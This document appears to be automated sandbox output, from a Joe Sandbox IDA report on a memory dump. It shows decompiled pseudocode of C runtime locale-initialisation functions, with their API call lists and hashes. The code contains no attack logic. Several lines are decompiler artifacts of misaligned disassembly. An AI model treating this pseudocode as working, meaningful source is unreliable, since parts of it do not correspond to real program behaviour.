                                                          				E009B4CB1(_t390, _t395, _t445 | E009B4CB1(_t390, _t395, _t444 | E009B4CB1(_t390, _t395, _t444, _t477 - 8, 2, _t390, 0x30, _t395 + 0xd0), _t477 - 8, 2, _t390, 0x44, _t395 + 0xec), _t477 - 8, 2, _t390, 0x45, _t395 + 0xf0);
                                                          				_t308 = _t395 + 0xf4;
                                                          				 *_t308 =  *_t308 + _t308;
                                                          				 *((intOrPtr*)(_t308 + 0x6a)) =  *((intOrPtr*)(_t308 + 0x6a)) + _t393;
                                                          				_push(_t390);
                                                          				_push(2);
                                                          				_push(_t477 - 8);
                                                          				_t450 = 0xfffffffff00c03c0 | E009B4CB1(_t390, _t395, 0xfffffffff00c03c0);
                                                          				_t451 = _t450 | E009B4CB1(_t390, _t395, _t450, _t477 - 8, 2, _t390, 0x47, _t395 + 0xf8);
                                                          				_t452 = _t451 | E009B4CB1(_t390, _t395, _t451, _t477 - 8, 2, _t390, 0x48, _t395 + 0xfc);
                                                          				_t453 = _t452 | E009B4CB1(_t390, _t395, _t452, _t477 - 8, 2, _t390, 0x49, _t395 + 0x100);
                                                          				_t454 = _t453 | E009B4CB1(_t390, _t395, _t453, _t477 - 8, 2, _t390, 0x4a, _t395 + 0x104);
                                                          				_t455 = _t454 | E009B4CB1(_t390, _t395, _t454, _t477 - 8, 2, _t390, 0x4b, _t395 + 0x108);
                                                          				_t456 = _t455 | E009B4CB1(_t390, _t395, _t455, _t477 - 8, 2, _t390, 0x4c, _t395 + 0x10c);
                                                          				_t457 = _t456 | E009B4CB1(_t390, _t395, _t456, _t477 - 8, 2, _t390, 0x4d, _t395 + 0x110);
                                                          				_t458 = _t457 | E009B4CB1(_t390, _t395, _t457, _t477 - 8, 2, _t390, 0x4e, _t395 + 0x114);
                                                          				_t459 = _t458 | E009B4CB1(_t390, _t395, _t458, _t477 - 8, 2, _t390, 0x4f, _t395 + 0x118);
                                                          				_t460 = _t459 | E009B4CB1(_t390, _t395, _t459, _t477 - 8, 2, _t390, 0x38, _t395 + 0x11c);
                                                          				_t461 = _t460 | E009B4CB1(_t390, _t395, _t460, _t477 - 8, 2, _t390, 0x39, _t395 + 0x120);
                                                          				_t462 = _t461 | E009B4CB1(_t390, _t395, _t461, _t477 - 8, 2, _t390, 0x3a, _t395 + 0x124);
                                                          				_t463 = _t462 | E009B4CB1(_t390, _t395, _t462, _t477 - 8, 2, _t390, 0x3b, _t395 + 0x128);
                                                          				_t464 = _t463 | E009B4CB1(_t390, _t395, _t463, _t477 - 8, 2, _t390, 0x3c, _t395 + 0x12c);
                                                          				_t465 = _t464 | E009B4CB1(_t390, _t395, _t464, _t477 - 8, 2, _t390, 0x3d, _t395 + 0x130);
                                                          				_t466 = _t465 | E009B4CB1(_t390, _t395, _t465, _t477 - 8, 2, _t390, 0x3e, _t395 + 0x134);
                                                          				_t467 = _t466 | E009B4CB1(_t390, _t395, _t466, _t477 - 8, 2, _t390, 0x3f, _t395 + 0x138);
                                                          				_t468 = _t467 | E009B4CB1(_t390, _t395, _t467, _t477 - 8, 2, _t390, 0x40, _t395 + 0x13c);
                                                          				_t469 = _t468 | E009B4CB1(_t390, _t395, _t468, _t477 - 8, 2, _t390, 0x41, _t395 + 0x140);
                                                          				_t470 = _t469 | E009B4CB1(_t390, _t395, _t469, _t477 - 8, 2, _t390, 0x42, _t395 + 0x144);
                                                          				_t471 = _t470 | E009B4CB1(_t390, _t395, _t470, _t477 - 8, 2, _t390, 0x43, _t395 + 0x148);
                                                          				_t472 = _t471 | E009B4CB1(_t390, _t395, _t471, _t477 - 8, 2, _t390, 0x28, _t395 + 0x14c);
                                                          				_t473 = _t472 | E009B4CB1(_t390, _t395, _t472, _t477 - 8, 2, _t390, 0x29, _t395 + 0x150);
                                                          				_t474 = _t473 | E009B4CB1(_t390, _t395, _t473, _t477 - 8, 2, _t390, 0x1f, _t395 + 0x154);
                                                          				_t475 = _t474 | E009B4CB1(_t390, _t395, _t474, _t477 - 8, 2, _t390, 0x20, _t395 + 0x158);
                                                          				_t389 = E009B4CB1(_t390, _t395, _t475, _t477 - 8, 2, _t390, 0x1003, _t395 + 0x15c) | _t475;
                                                          				return _t389;
                                                          			}





















































































                                                          APIs
                                                          • ___getlocaleinfo.LIBCMT ref: 009B90AE
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D03
                                                            • Part of subcall function 009B4CB1: GetLastError.KERNEL32 ref: 009B4D15
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D35
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4D4A
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D77
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4D8C
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4DA4
                                                          • ___getlocaleinfo.LIBCMT ref: 009B90C5
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4DE4
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4E0E
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4E34
                                                            • Part of subcall function 009B4CB1: __invoke_watson.LIBCMT ref: 009B4E84
                                                          • ___getlocaleinfo.LIBCMT ref: 009B90D9
                                                          • ___getlocaleinfo.LIBCMT ref: 009B90ED
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9101
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9118
                                                          • ___getlocaleinfo.LIBCMT ref: 009B912C
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9140
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9154
                                                          • ___getlocaleinfo.LIBCMT ref: 009B916B
                                                          • ___getlocaleinfo.LIBCMT ref: 009B917F
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9193
                                                          • ___getlocaleinfo.LIBCMT ref: 009B91A7
                                                          • ___getlocaleinfo.LIBCMT ref: 009B91BE
                                                          • ___getlocaleinfo.LIBCMT ref: 009B91D2
                                                          • ___getlocaleinfo.LIBCMT ref: 009B91E6
                                                          • ___getlocaleinfo.LIBCMT ref: 009B91FA
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9211
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9225
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9239
                                                          • ___getlocaleinfo.LIBCMT ref: 009B924D
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9264
                                                          • ___getlocaleinfo.LIBCMT ref: 009B927B
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9292
                                                          • ___getlocaleinfo.LIBCMT ref: 009B92A9
                                                          • ___getlocaleinfo.LIBCMT ref: 009B92C3
                                                          • ___getlocaleinfo.LIBCMT ref: 009B92DA
                                                          • ___getlocaleinfo.LIBCMT ref: 009B92F1
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9308
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9322
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9339
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9350
                                                          • ___getlocaleinfo.LIBCMT ref: 009B936A
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9387
                                                          • ___getlocaleinfo.LIBCMT ref: 009B939E
                                                          • ___getlocaleinfo.LIBCMT ref: 009B93B5
                                                          • ___getlocaleinfo.LIBCMT ref: 009B93CC
                                                          • ___getlocaleinfo.LIBCMT ref: 009B93E6
                                                          • ___getlocaleinfo.LIBCMT ref: 009B93FD
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9414
                                                          • ___getlocaleinfo.LIBCMT ref: 009B942B
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9445
                                                          • ___getlocaleinfo.LIBCMT ref: 009B945C
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9473
                                                          • ___getlocaleinfo.LIBCMT ref: 009B948A
                                                          • ___getlocaleinfo.LIBCMT ref: 009B94A4
                                                          • ___getlocaleinfo.LIBCMT ref: 009B94BB
                                                          • ___getlocaleinfo.LIBCMT ref: 009B94D2
                                                          • ___getlocaleinfo.LIBCMT ref: 009B94E9
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9503
                                                          • ___getlocaleinfo.LIBCMT ref: 009B951A
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9531
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9548
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9562
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9579
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9590
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95A7
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95C1
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95D8
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95EF
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9606
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9620
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9637
                                                          • ___getlocaleinfo.LIBCMT ref: 009B964E
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9665
                                                          • ___getlocaleinfo.LIBCMT ref: 009B967F
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9696
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96AD
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96C4
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96DE
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96F5
                                                          • ___getlocaleinfo.LIBCMT ref: 009B970C
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9723
                                                          • ___getlocaleinfo.LIBCMT ref: 009B973D
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9754
                                                          • ___getlocaleinfo.LIBCMT ref: 009B976B
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9785
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: ___getlocaleinfo$InfoLocale___crt__calloc_crt_free$ErrorLast__invoke_watson
                                                          • String ID:
                                                          • API String ID: 2187842456-0
                                                          • Opcode ID: d759e5674001a84f0b18ca5f04d9a2ed76447e3db9bf8deeb58554736b45e393
                                                          • Instruction ID: 10357514cfec4c5aa36968ffa3056d483bde9b149d2796770ee827bb6a0f6d53
                                                          • Opcode Fuzzy Hash: d759e5674001a84f0b18ca5f04d9a2ed76447e3db9bf8deeb58554736b45e393
                                                          • Instruction Fuzzy Hash: 1822D9B3D4120D7AE72297F0CD86FEBBBACA704B40F044622F745E7481FAB4A65457A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 90%
                                                          			E009A419C(signed int __eax, void* __ecx, void* __edx, void* __edi, signed int __esi) {
                                                          				void* __ebx;
                                                          				signed int _t183;
                                                          				intOrPtr* _t187;
                                                          				signed int _t268;
                                                          				void* _t269;
                                                          				void* _t272;
                                                          				void* _t274;
                                                          				signed int _t277;
                                                          				signed int _t278;
                                                          				signed int _t279;
                                                          				signed int _t280;
                                                          				signed int _t281;
                                                          				signed int _t282;
                                                          				signed int _t283;
                                                          				signed int _t284;
                                                          				signed int _t285;
                                                          				signed int _t286;
                                                          				signed int _t287;
                                                          				signed int _t288;
                                                          				signed int _t289;
                                                          				signed int _t290;
                                                          				signed int _t291;
                                                          				signed int _t292;
                                                          				signed int _t293;
                                                          				signed int _t294;
                                                          				signed int _t295;
                                                          				signed int _t296;
                                                          				signed int _t297;
                                                          				signed int _t298;
                                                          				signed int _t299;
                                                          				signed int _t304;
                                                          				signed int _t305;
                                                          				signed int _t306;
                                                          				signed int _t307;
                                                          				signed int _t308;
                                                          				signed int _t309;
                                                          				signed int _t310;
                                                          				signed int _t311;
                                                          				signed int _t312;
                                                          				signed int _t313;
                                                          				signed int _t314;
                                                          				signed int _t315;
                                                          				signed int _t316;
                                                          				signed int _t317;
                                                          				signed int _t318;
                                                          				signed int _t319;
                                                          				signed int _t320;
                                                          				signed int _t321;
                                                          				signed int _t322;
                                                          				signed int _t323;
                                                          				signed int _t324;
                                                          				signed int _t325;
                                                          				signed int _t326;
                                                          				signed int _t327;
                                                          				signed int _t328;
                                                          				signed int _t329;
                                                          				signed int _t330;
                                                          				void* _t332;
                                                          				void* _t334;
                                                          				void* _t340;
                                                          
                                                          				_t272 = __edx;
                                                          				 *((intOrPtr*)(_t332 - 0x17af07bb)) =  *((intOrPtr*)(_t332 - 0x17af07bb)) + __ecx;
                                                          				_t274 = __edi +  *((intOrPtr*)(__edx - 0x3b7c0001));
                                                          				_push(__eax);
                                                          				_t277 = __esi | __eax;
                                                          				_t278 = _t277 | E009B4CB1(_t269, _t274, _t277, _t332 - 8, 1, _t269, 0x41, _t274 + 0x8c);
                                                          				_t279 = _t278 | E009B4CB1(_t269, _t274, _t278, _t332 - 8, 1, _t269, 0x42, _t274 + 0x90);
                                                          				_t280 = _t279 | E009B4CB1(_t269, _t274, _t279, _t332 - 8, 1, _t269, 0x43, _t274 + 0x94);
                                                          				_t281 = _t280 | E009B4CB1(_t269, _t274, _t280, _t332 - 8, 1, _t269, 0x28, _t274 + 0x98);
                                                          				_t282 = _t281 | E009B4CB1(_t269, _t274, _t281, _t332 - 8, 1, _t269, 0x29, _t274 + 0x9c);
                                                          				_t283 = _t282 | E009B4CB1(_t269, _t274, _t282, _t332 - 8, 1, _t269, 0x1f, _t274 + 0xa0);
                                                          				_t284 = _t283 | E009B4CB1(_t269, _t274, _t283, _t332 - 8, 1, _t269, 0x20, _t274 + 0xa4);
                                                          				_t285 = _t284 | E009B4CB1(_t269, _t274, _t284, _t332 - 8, 1, _t269, 0x1003, _t274 + 0xa8);
                                                          				_t286 = _t285 | E009B4CB1(_t269, _t274, _t285, _t332 - 8, 0, _t269, 0x1009, _t274 + 0xac);
                                                          				_t287 = _t286 | E009B4CB1(_t269, _t274, _t286, _t332 - 8, 2, _t269, 0x31, _t274 + 0xb8);
                                                          				_t288 = _t287 | E009B4CB1(_t269, _t274, _t287, _t332 - 8, 2, _t269, 0x32, _t274 + 0xbc);
                                                          				_t289 = _t288 | E009B4CB1(_t269, _t274, _t288, _t332 - 8, 2, _t269, 0x33, _t274 + 0xc0);
                                                          				_t290 = _t289 | E009B4CB1(_t269, _t274, _t289, _t332 - 8, 2, _t269, 0x34, _t274 + 0xc4);
                                                          				_t291 = _t290 | E009B4CB1(_t269, _t274, _t290, _t332 - 8, 2, _t269, 0x35, _t274 + 0xc8);
                                                          				_t292 = _t291 | E009B4CB1(_t269, _t274, _t291, _t332 - 8, 2, _t269, 0x36, _t274 + 0xcc);
                                                          				_t293 = _t292 | E009B4CB1(_t269, _t274, _t292, _t332 - 8, 2, _t269, 0x37, _t274 + 0xb4);
                                                          				_t294 = _t293 | E009B4CB1(_t269, _t274, _t293, _t332 - 8, 2, _t269, 0x2a, _t274 + 0xd4);
                                                          				_t295 = _t294 | E009B4CB1(_t269, _t274, _t294, _t332 - 8, 2, _t269, 0x2b, _t274 + 0xd8);
                                                          				_t296 = _t295 | E009B4CB1(_t269, _t274, _t295, _t332 - 8, 2, _t269, 0x2c, _t274 + 0xdc);
                                                          				_t297 = _t296 | E009B4CB1(_t269, _t274, _t296, _t332 - 8, 2, _t269, 0x2d, _t274 + 0xe0);
                                                          				_t298 = _t297 | E009B4CB1(_t269, _t274, _t297, _t332 - 8, 2, _t269, 0x2e, _t274 + 0xe4);
                                                          				_t299 = _t298 | E009B4CB1(_t269, _t274, _t298, _t332 - 8, 2, _t269, 0x2f, _t274 + 0xe8);
                                                          				_t300 = _t299 | E009B4CB1(_t269, _t274, _t299, _t332 - 8, 2, _t269, 0x30, _t274 + 0xd0);
                                                          				_t183 = E009B4CB1(_t269, _t274, _t299 | E009B4CB1(_t269, _t274, _t299, _t332 - 8, 2, _t269, 0x30, _t274 + 0xd0), _t332 - 8, 2, _t269, 0x44, _t274 + 0xec);
                                                          				_t340 = _t334 + 0x1e0;
                                                          				E009B4CB1(_t269, _t274, _t300 | _t183, _t332 - 8, 2, _t269, 0x45, _t274 + 0xf0);
                                                          				_t187 = _t274 + 0xf4;
                                                          				 *_t187 =  *_t187 + _t187;
                                                          				 *((intOrPtr*)(_t187 + 0x6a)) =  *((intOrPtr*)(_t187 + 0x6a)) + _t272;
                                                          				_t304 = _t340 + 1;
                                                          				_push(_t269);
                                                          				_push(2);
                                                          				_push(_t332 - 8);
                                                          				_t305 = _t304 | E009B4CB1(_t269, _t274, _t304);
                                                          				_t306 = _t305 | E009B4CB1(_t269, _t274, _t305, _t332 - 8, 2, _t269, 0x47, _t274 + 0xf8);
                                                          				_t307 = _t306 | E009B4CB1(_t269, _t274, _t306, _t332 - 8, 2, _t269, 0x48, _t274 + 0xfc);
                                                          				_t308 = _t307 | E009B4CB1(_t269, _t274, _t307, _t332 - 8, 2, _t269, 0x49, _t274 + 0x100);
                                                          				_t309 = _t308 | E009B4CB1(_t269, _t274, _t308, _t332 - 8, 2, _t269, 0x4a, _t274 + 0x104);
                                                          				_t310 = _t309 | E009B4CB1(_t269, _t274, _t309, _t332 - 8, 2, _t269, 0x4b, _t274 + 0x108);
                                                          				_t311 = _t310 | E009B4CB1(_t269, _t274, _t310, _t332 - 8, 2, _t269, 0x4c, _t274 + 0x10c);
                                                          				_t312 = _t311 | E009B4CB1(_t269, _t274, _t311, _t332 - 8, 2, _t269, 0x4d, _t274 + 0x110);
                                                          				_t313 = _t312 | E009B4CB1(_t269, _t274, _t312, _t332 - 8, 2, _t269, 0x4e, _t274 + 0x114);
                                                          				_t314 = _t313 | E009B4CB1(_t269, _t274, _t313, _t332 - 8, 2, _t269, 0x4f, _t274 + 0x118);
                                                          				_t315 = _t314 | E009B4CB1(_t269, _t274, _t314, _t332 - 8, 2, _t269, 0x38, _t274 + 0x11c);
                                                          				_t316 = _t315 | E009B4CB1(_t269, _t274, _t315, _t332 - 8, 2, _t269, 0x39, _t274 + 0x120);
                                                          				_t317 = _t316 | E009B4CB1(_t269, _t274, _t316, _t332 - 8, 2, _t269, 0x3a, _t274 + 0x124);
                                                          				_t318 = _t317 | E009B4CB1(_t269, _t274, _t317, _t332 - 8, 2, _t269, 0x3b, _t274 + 0x128);
                                                          				_t319 = _t318 | E009B4CB1(_t269, _t274, _t318, _t332 - 8, 2, _t269, 0x3c, _t274 + 0x12c);
                                                          				_t320 = _t319 | E009B4CB1(_t269, _t274, _t319, _t332 - 8, 2, _t269, 0x3d, _t274 + 0x130);
                                                          				_t321 = _t320 | E009B4CB1(_t269, _t274, _t320, _t332 - 8, 2, _t269, 0x3e, _t274 + 0x134);
                                                          				_t322 = _t321 | E009B4CB1(_t269, _t274, _t321, _t332 - 8, 2, _t269, 0x3f, _t274 + 0x138);
                                                          				_t323 = _t322 | E009B4CB1(_t269, _t274, _t322, _t332 - 8, 2, _t269, 0x40, _t274 + 0x13c);
                                                          				_t324 = _t323 | E009B4CB1(_t269, _t274, _t323, _t332 - 8, 2, _t269, 0x41, _t274 + 0x140);
                                                          				_t325 = _t324 | E009B4CB1(_t269, _t274, _t324, _t332 - 8, 2, _t269, 0x42, _t274 + 0x144);
                                                          				_t326 = _t325 | E009B4CB1(_t269, _t274, _t325, _t332 - 8, 2, _t269, 0x43, _t274 + 0x148);
                                                          				_t327 = _t326 | E009B4CB1(_t269, _t274, _t326, _t332 - 8, 2, _t269, 0x28, _t274 + 0x14c);
                                                          				_t328 = _t327 | E009B4CB1(_t269, _t274, _t327, _t332 - 8, 2, _t269, 0x29, _t274 + 0x150);
                                                          				_t329 = _t328 | E009B4CB1(_t269, _t274, _t328, _t332 - 8, 2, _t269, 0x1f, _t274 + 0x154);
                                                          				_t330 = _t329 | E009B4CB1(_t269, _t274, _t329, _t332 - 8, 2, _t269, 0x20, _t274 + 0x158);
                                                          				_t268 = E009B4CB1(_t269, _t274, _t330, _t332 - 8, 2, _t269, 0x1003, _t274 + 0x15c) | _t330;
                                                          				return _t268;
                                                          			}

                                                          APIs
                                                          • ___getlocaleinfo.LIBCMT ref: 009B92C3
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D03
                                                            • Part of subcall function 009B4CB1: GetLastError.KERNEL32 ref: 009B4D15
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D35
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4D4A
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D77
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4D8C
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4DA4
                                                          • ___getlocaleinfo.LIBCMT ref: 009B92DA
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4DE4
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4E0E
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4E34
                                                            • Part of subcall function 009B4CB1: __invoke_watson.LIBCMT ref: 009B4E84
                                                          • ___getlocaleinfo.LIBCMT ref: 009B92F1
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9308
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9322
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9339
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9350
                                                          • ___getlocaleinfo.LIBCMT ref: 009B936A
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9387
                                                          • ___getlocaleinfo.LIBCMT ref: 009B939E
                                                          • ___getlocaleinfo.LIBCMT ref: 009B93B5
                                                          • ___getlocaleinfo.LIBCMT ref: 009B93CC
                                                          • ___getlocaleinfo.LIBCMT ref: 009B93E6
                                                          • ___getlocaleinfo.LIBCMT ref: 009B93FD
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9414
                                                          • ___getlocaleinfo.LIBCMT ref: 009B942B
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9445
                                                          • ___getlocaleinfo.LIBCMT ref: 009B945C
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9473
                                                          • ___getlocaleinfo.LIBCMT ref: 009B948A
                                                          • ___getlocaleinfo.LIBCMT ref: 009B94A4
                                                          • ___getlocaleinfo.LIBCMT ref: 009B94BB
                                                          • ___getlocaleinfo.LIBCMT ref: 009B94D2
                                                          • ___getlocaleinfo.LIBCMT ref: 009B94E9
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9503
                                                          • ___getlocaleinfo.LIBCMT ref: 009B951A
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9531
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9548
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9562
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9579
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9590
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95A7
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95C1
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95D8
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95EF
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9606
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9620
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9637
                                                          • ___getlocaleinfo.LIBCMT ref: 009B964E
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9665
                                                          • ___getlocaleinfo.LIBCMT ref: 009B967F
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9696
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96AD
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96C4
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96DE
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96F5
                                                          • ___getlocaleinfo.LIBCMT ref: 009B970C
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9723
                                                          • ___getlocaleinfo.LIBCMT ref: 009B973D
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9754
                                                          • ___getlocaleinfo.LIBCMT ref: 009B976B
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9785
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: ___getlocaleinfo$InfoLocale___crt__calloc_crt_free$ErrorLast__invoke_watson
                                                          • String ID:
                                                          • API String ID: 2187842456-0
                                                          • Opcode ID: 8375b925f5075488876cc9cab56261634bb77b2d62e2c670fe3a5a182e7b013c
                                                          • Instruction ID: 6e8214fe5e7f4c6d73932429b3962ef00e9e2aa88c85c0fbdba6f399621dcba6
                                                          • Opcode Fuzzy Hash: 8375b925f5075488876cc9cab56261634bb77b2d62e2c670fe3a5a182e7b013c
                                                          • Instruction Fuzzy Hash: 71F1D9B7E4120D7AE72697F0CD86FEBB7ACA704B40F004622F755E7082FAB4665457A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 86%
                                                          			E009A2B81(intOrPtr* __eax, void* __edx, void* __edi, void* __esi) {
                                                          				void* __ebx;
                                                          				signed int _t138;
                                                          				void* _t139;
                                                          				signed int _t146;
                                                          				signed int _t147;
                                                          				signed int _t148;
                                                          				signed int _t149;
                                                          				signed int _t150;
                                                          				signed int _t151;
                                                          				signed int _t152;
                                                          				signed int _t153;
                                                          				signed int _t154;
                                                          				signed int _t155;
                                                          				signed int _t156;
                                                          				signed int _t157;
                                                          				signed int _t158;
                                                          				signed int _t159;
                                                          				signed int _t160;
                                                          				signed int _t161;
                                                          				signed int _t162;
                                                          				signed int _t163;
                                                          				signed int _t164;
                                                          				signed int _t165;
                                                          				signed int _t166;
                                                          				signed int _t167;
                                                          				signed int _t168;
                                                          				signed int _t169;
                                                          				signed int _t170;
                                                          				signed int _t171;
                                                          				signed int _t172;
                                                          				void* _t174;
                                                          				void* _t176;
                                                          
                                                          				 *__eax =  *__eax + __eax;
                                                          				 *((intOrPtr*)(__eax + 0x6a)) =  *((intOrPtr*)(__eax + 0x6a)) + __edx;
                                                          				_t146 = _t176 + 1;
                                                          				_push(_t139);
                                                          				_push(2);
                                                          				_push(_t174 - 8);
                                                          				_t147 = _t146 | E009B4CB1(_t139, __edi, _t146);
                                                          				_t148 = _t147 | E009B4CB1(_t139, __edi, _t147, _t174 - 8, 2, _t139, 0x47, __edi + 0xf8);
                                                          				_t149 = _t148 | E009B4CB1(_t139, __edi, _t148, _t174 - 8, 2, _t139, 0x48, __edi + 0xfc);
                                                          				_t150 = _t149 | E009B4CB1(_t139, __edi, _t149, _t174 - 8, 2, _t139, 0x49, __edi + 0x100);
                                                          				_t151 = _t150 | E009B4CB1(_t139, __edi, _t150, _t174 - 8, 2, _t139, 0x4a, __edi + 0x104);
                                                          				_t152 = _t151 | E009B4CB1(_t139, __edi, _t151, _t174 - 8, 2, _t139, 0x4b, __edi + 0x108);
                                                          				_t153 = _t152 | E009B4CB1(_t139, __edi, _t152, _t174 - 8, 2, _t139, 0x4c, __edi + 0x10c);
                                                          				_t154 = _t153 | E009B4CB1(_t139, __edi, _t153, _t174 - 8, 2, _t139, 0x4d, __edi + 0x110);
                                                          				_t155 = _t154 | E009B4CB1(_t139, __edi, _t154, _t174 - 8, 2, _t139, 0x4e, __edi + 0x114);
                                                          				_t156 = _t155 | E009B4CB1(_t139, __edi, _t155, _t174 - 8, 2, _t139, 0x4f, __edi + 0x118);
                                                          				_t157 = _t156 | E009B4CB1(_t139, __edi, _t156, _t174 - 8, 2, _t139, 0x38, __edi + 0x11c);
                                                          				_t158 = _t157 | E009B4CB1(_t139, __edi, _t157, _t174 - 8, 2, _t139, 0x39, __edi + 0x120);
                                                          				_t159 = _t158 | E009B4CB1(_t139, __edi, _t158, _t174 - 8, 2, _t139, 0x3a, __edi + 0x124);
                                                          				_t160 = _t159 | E009B4CB1(_t139, __edi, _t159, _t174 - 8, 2, _t139, 0x3b, __edi + 0x128);
                                                          				_t161 = _t160 | E009B4CB1(_t139, __edi, _t160, _t174 - 8, 2, _t139, 0x3c, __edi + 0x12c);
                                                          				_t162 = _t161 | E009B4CB1(_t139, __edi, _t161, _t174 - 8, 2, _t139, 0x3d, __edi + 0x130);
                                                          				_t163 = _t162 | E009B4CB1(_t139, __edi, _t162, _t174 - 8, 2, _t139, 0x3e, __edi + 0x134);
